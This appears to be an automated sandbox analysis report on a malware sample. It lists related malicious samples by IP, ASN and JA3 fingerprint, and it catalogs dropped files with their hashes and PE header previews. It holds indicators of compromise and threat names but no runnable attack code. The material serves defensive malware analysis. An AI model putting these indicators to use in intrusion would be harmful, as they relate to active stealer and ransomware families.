	contact_me.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Gurcu Stealer	Browse	208.95.112.1
	contact_me.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	208.95.112.1
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	bKJ7.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	bKJA.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	glzfNGT2uK.exe	Get hash	malicious	ManusCrypt, Nitol	Browse	208.95.112.1
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	208.95.112.1
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	208.95.112.1
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	208.95.112.1
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	1HYkac8PAl.apk	Get hash	malicious	Unknown	Browse	208.95.112.1
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	208.95.112.1
	Service.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	208.95.112.1
	file.exe	Get hash	malicious	ManusCrypt, Nitol	Browse	208.95.112.1
	bKDP.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	contact_me.exe	Get hash	malicious	Unknown	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Djvu	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Djvu	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Djvu	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Djvu	Browse	144.76.136.153

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\re.exe	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_123.exe_e53c36ec8878b9d196e5e938606ed8f535f8_663869f4_11ae5358\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6203671336435339
Encrypted:	false
SSDEEP:	96:pUK/U2FwEVfVBibS7lhcoI7RA6tpXIQcQvc6QcEDMcw3DSuH+HbHg6ZAXGng5FMN:pBbz4uCHBUZMXQjE/u7sCS274ItjCc
MD5:	0DCF48F80F61533FD5A09496FEF1E4A8
SHA1:	4199AA6411426E30A19CEB6DF1F831F2073FFD37
SHA-256:	312F1617AAF55B8228E65FE5AAF6A89FA4487A31F2B5AA9F6412CF59923F8FE1
SHA-512:	A51F0641A6B0D82CFE8AD1810B6469BF092A35475F2217EE0313C6A9ECFB1A5D7B046434AECD421E4846704446D0E84B3173655E22EB064B3E3C2F74E7BCDBF0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.1.4.3.4.7.8.6.2.1.5.4.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.1.4.3.4.7.9.4.8.0.9.1.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.5.f.5.5.9.5.-.1.f.8.8.-.4.6.c.5.-.a.5.a.8.-.5.8.2.c.5.5.0.2.f.4.7.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.0.b.a.6.c.7.-.8.e.d.6.-.4.d.1.d.-.9.e.7.a.-.b.0.4.5.1.e.3.b.4.1.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.3.c.-.0.0.0.1.-.0.0.1.a.-.7.a.1.8.-.f.0.0.3.6.1.5.e.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.d.3.e.2.7.1.9.9.5.5.5.5.1.e.e.6.3.a.f.a.0.3.a.3.5.a.7.9.a.8.0.0.0.0.f.f.f.f.!.0.0.0.0.0.6.1.a.f.5.8.8.7.0.5.3.0.9.7.f.8.6.f.6.d.8.f.0.1.0.7.6.a.f.1.6.2.4.b.e.2.e.d.f.!.1.2.3...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.2.3.:.1.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_321.exe_5a3d7538a657b059d8e1c0a59dbdaad7a4c02_db58721d_1a3a5367\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6203266022755402
Encrypted:	false
SSDEEP:	96:pU//UJFCjp5jgMFhlSoI7RA6tpXIQcQvc6QcEDMcw3DSOn+HbHg6ZAXGng5FMTPx:pi4UjpKRHBUZMXQjE/u7sCS274Itj
MD5:	E40DD456C30E13E996CBF520564CB9CA
SHA1:	155436F44937432E217FFABCC708CA8AB4A6C8DF
SHA-256:	27D7D95BB5AC5AA9C79E79C6117E2AB9997C82D2C7B52DA5E30C60AFDDDAB433
SHA-512:	F25C2E8B0059DC2CDF4FD0EF724CB8EAF14EEB0CA4F2182234C4C92FEB6C57A406F77B4399DC17FDDF6852F97687EE3F9616286C65F538B80F925FE93EFDE20F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.1.4.3.4.7.9.9.9.7.8.1.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.1.4.3.4.8.0.5.9.1.5.8.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.e.7.1.9.c.1.-.4.0.d.b.-.4.2.e.7.-.b.5.d.4.-.5.6.4.e.1.2.1.6.8.5.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.c.d.b.8.5.1.-.7.2.7.e.-.4.3.2.5.-.a.b.4.3.-.6.c.8.a.2.b.d.2.e.6.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.2.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.2.0.-.0.0.0.1.-.0.0.1.a.-.6.2.e.d.-.2.a.0.4.6.1.5.e.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.c.8.2.c.d.2.e.6.6.8.c.1.d.4.3.c.4.d.2.6.c.4.9.6.c.e.7.1.5.2.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.5.c.d.7.8.a.a.e.a.9.d.0.1.3.6.f.1.1.4.e.d.b.0.d.9.8.e.4.5.8.3.2.9.1.b.0.a.c.!.3.2.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.2.3.:.1.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4202.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 24 14:57:59 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	18782
Entropy (8bit):	2.037351135395136
Encrypted:	false
SSDEEP:	96:5qn8iXU8M/Oec8tzi7kYfMygk9A6sFRWInWIX4IIElbc/T:Ristc8tzOQygQpsYElQ/T
MD5:	EBD2D9B7579BBB46A919EA9C2A3D9CB2
SHA1:	E2F651861B3251F5B0F55086C5505905AE6F004F
SHA-256:	BE833A230D664D9FABBB37A4D328136A8475DAF6CECD19A784BF140D9E109F55
SHA-512:	6026CFD90ED772C483BA3F4A2836B4C62AF120FC38F0A22000660EBB18FA42E6F83948FEAD2986F9AB48E77C6CB0EF27F9D8D7428873777271B2C055338CEFAF
Malicious:	false
Preview:	MDMP....... .......w..d............4........... ...<.......D...............T.......8...........T...........H....@..........\...........H....................................................................U...........B..............GenuineIntelW...........T.......<...s..d.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER438A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8344
Entropy (8bit):	3.698901192349146
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi9l6Ha6YvP6X+HVmgmfWS/UCprZ89b4oisfwBqem:RrlsNif6Ha6YX6XuVmgmfWSC4ohfRH
MD5:	00D57968F0FC2C9AE16DE82AA7420FCA
SHA1:	6E18EAE429805CB79BE6CAB7D10D1B6888FC7E15
SHA-256:	6ECF314A7DFB8007A443834679E38C9B8CC86B91182FA5D9ADDA2E5F0295821B
SHA-512:	9CD092F29100F2622E636F0448F9F812946ACBD3A58B200D6A5F0F42F76AFCAF944C858967B6E6B6E1BA13468BB9D299FF6DF2043AB01EAA1D4FD8430C88DEBE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.8.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4427.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	4.4489818518928494
Encrypted:	false
SSDEEP:	48:cvIwSD8zs9JgtWI9UKrWgc8sqYjO8fm8M4J1ZvMFR++q8veZvVbFid:uITfX/LgrsqYHJ3c+KWVbFid
MD5:	F9B60CFF1AB4835FEF3055066BB8FEFA
SHA1:	37C9B85C99A7FB260BBA164700F1BA5C40E45E14
SHA-256:	508D5FB7F6C922FA85228070C883C9BE855FC7ECEDA7EFCC6482E1DF99D416D4
SHA-512:	022F4C5FEAC50FD527C4FCB56550FB480F94E946ED6553CF6712B2639DFA127C0863A12BECC79BBC33C0FFE11B86DFDFF32D8E4CF62BC00164AD9E461B049E42
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1967048" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4723.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 24 14:58:00 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	18326
Entropy (8bit):	2.084301222328458
Encrypted:	false
SSDEEP:	96:5/8in8M/idxcSi92kBi7kXGV7MJp6ptTmsWInWIXgIp4TgVlqAI:qiPYxcSiLBOXV7Mmp5N4UVkAI
MD5:	9D43DF0E4155552E65C5F1DC73E21AFA
SHA1:	61FCAC8610F6AD117E963FD450C6AB034DE8D6E0
SHA-256:	B0DE7F2ABEABC1CB16768AC66DD0FB2AF04384A1DF58E88F79B7B65ACC6E20C8
SHA-512:	8E5BDF391385AC7D368E476EF85B81BAD783892877364500F971DB0C01DD01FE7B27EA9535C1E64D9FF36431C03D189D9619F2D65C57659C3B23D4ECD20B3452
Malicious:	false
Preview:	MDMP....... .......x..d............4........... ...<.......D...............T.......8...........T...........H...N>..........\...........H....................................................................U...........B..............GenuineIntelW...........T....... ...s..d.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER484C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.6946098250652857
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6/A6l4Te6Yv56X8JVmgmfyS/UCprY89b8CsfX50m:RrlsNiV6X6YB6XCVmgmfySR8BfX/
MD5:	15B3E5FCFD59103596284AB67DAA8759
SHA1:	8CE89261C997F1A6E16BC6E0303741A1FF8664A8
SHA-256:	CD71994838A446148E390C8F0641A9D6D4860C8DBC9AEA5414B4A244767927AB
SHA-512:	8F840FB4466282ECC30ABF03D2E29CEC2C6567D75D34A7741528B950C47D3C32DE9856CB809155A35907A5DA9DF91A6CA7FB7D0EAD105A8E401AACE898B21AFA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER48AB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	4.444797432484652
Encrypted:	false
SSDEEP:	48:cvIwSD8zs9JgtWI9UKrWgc8sqYjI8fm8M4J+6ZvMFX+q8vUZvDASeKOfi5d:uITfX/LgrsqYBJ+K6K4DXqi5d
MD5:	ED2917D3DD803D9235B5DA9FEA508AAB
SHA1:	86943A8AB2C0BDFE54469878174EA86690D46FA1
SHA-256:	219948B26D22137DF6DB1EC893A682E01E05E15EC4B60DB9B8E73675BDF0C19F
SHA-512:	BD23B4414ED97DFB606DA439232E2479E6986674E92297F4715CCF59A280A0D869BE33B07F2AE2433740D3F5610832923A321AAB2A9D5FB1749E1B7DC6A36B3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1967048" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\gggge[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.51833957423091
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
MD5:	84855C13836B389D5EC7CFD4C9266173
SHA1:	1CF3056FF23C4176FD7CA9816A000ED461D6D323
SHA-256:	502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
SHA-512:	2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.517190359844184
Encrypted:	false
SSDEEP:	3:YWR4buWsyLBHm+aG9fQ8I5CMt6HUSTn:YWybuiTaGWjjKn
MD5:	E7726B15BF91A57C26ED4F9B234F6079
SHA1:	6E353458B87B39D6E20D32D118425366BF1AFD45
SHA-256:	842BE40F0954EA384C937EDD0AD6ABA84FB9D1C65630E4173134101C6535DE78
SHA-512:	F25D199209A05A01401515C7C3B27269D24D02C7CE100AF073A1BC8360CF8958AFA5656D6471A94F77E01CD138DF6BA5DB3CAB5112EB585A2FD30B8C111CCC28
Malicious:	false
Preview:	{"status":"success","countryCode":"CH","city":"Zurich","timezone":"Europe/Zurich","query":"84.17.52.40"}

C:\Users\user\AppData\Local\Temp\re.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	734533849
Entropy (8bit):	0.01398227363039217
Encrypted:	false
SSDEEP:
MD5:	4D628054BC9957C99A76147FF2D1FF0F
SHA1:	F4768265903C3AAB2C04475ACEFD973EE1A081B6
SHA-256:	53D0BC467AAD4AC95C9655617B34E3859D0BEBA1D80167B4E8A697AA0FEC0B3B
SHA-512:	2E01FDE9A007D9ACCECF63723594DF13415DC2C6B686D8301C4C0F9AD8E4BEA287837C1169E9232EE6122A1DEFC21BEF6F5AEC852969FAE4047F9917014B63BD
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................$..........................@..........................p............@... .............................. ..T....P.......................`..\.................................................... ...............................text...............................`.P`.data...............................@.`..rdata..............................@.0@.bss..................................0..idata..T.... ......................@.0..CRT....4....0......................@.0..tls.........@......................@.0..rsrc........P......................@.0..reloc..\....`......................@.0B........................................................................................................................................................................................................................................................................

C:\Windows\Temp\123.exe

Download File

Process:	C:\Users\user\Desktop\1JCAVkYU3U.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	2.9725106185648
Encrypted:	false
SSDEEP:	6144:BOsITft4c1D9zb62mlIu/AO+SpVCVy6cc3oxPeeKP76Cl:BO3rt59QNIk6do46C
MD5:	067B24F2A101E4B49D45E14F81D41EDB
SHA1:	061AF5887053097F86F6D8F01076AF1624BE2EDF
SHA-256:	849714E42FEC819E12533675437EF5DDA0536D5AB92386AF48A8FA4A6DA3DB90
SHA-512:	1A80B9C10B724EF06779B7B3522F9354730DC406FAFCC4A5428D83C1F05BCF8CF1AD3FDC9F6BD6FDD2C01A556E2315D019826740E35D37BF52002E970334202C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T@e..!.F.!.F.!.F.J.G.!.F.J.G.!.F.J.G.!.F.J.G.!.F.!.FH!.Fp[.G.!.Fp[.G.!.Fp[.G[!.Ft[.G.!.Ft[.F.!.Ft[.G.!.FRich.!.F........PE..L......d............... ....................@....@.......................................@..................................(..(.... .......................0......p...................................@............@..4............................text....)......................... ..`.rdata.......@.......0..............@..@.data...h....0....... ..............@....rsrc........ ......................@..@.reloc.......0......................@..B.live1...<...P...>..................`. .........................................................................................................................................................................................................................................................................

C:\Windows\Temp\321.exe

Download File

Process:	C:\Users\user\Desktop\1JCAVkYU3U.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2072576
Entropy (8bit):	5.453619241541008
Encrypted:	false
SSDEEP:	49152:PdTv+cbh/xFA94HZei5KUolvexjanU6LVWh:PdTvTo9ugEKUolvexjanU6LVW
MD5:	5B87AD276E221A90FF038CB69929F321
SHA1:	CE5CD78AAEA9D0136F114EDB0D98E4583291B0AC
SHA-256:	FAB053BDBA1432A468E48639FFE50B44ADA624A139137AE7D55559DD05CAEAE0
SHA-512:	D9DB970E877D9FE2F252325B900ADDFD2E57B58F34F7BBB28434A2747E992069FAB004D537E2315DE484CDF91F9ABE7B1A1AFB49FC81E32A10D301703D8D6E4A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T@e..!.F.!.F.!.F.J.G.!.F.J.G.!.F.J.G.!.F.J.G.!.F.!.FH!.Fp[.G.!.Fp[.G.!.Fp[.G[!.Ft[.G.!.Ft[.F.!.Ft[.G.!.FRich.!.F........PE..L......d............... ....@...............@....@.......................................@..................................(..(....p..............................p...................................@............@..4............................text....)......................... ..`.rdata.......@.......0..............@..@.data...h1...0...$... ..............@....rsrc........p.......D..............@..@.reloc...............F..............@..B.live1...<.......>...b..............`. .........................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
